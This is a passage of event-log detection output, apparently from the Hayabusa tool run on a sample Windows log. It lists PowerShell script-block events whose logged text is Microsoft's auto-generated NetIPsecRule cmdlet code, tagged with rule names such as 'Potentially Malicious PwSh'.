[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 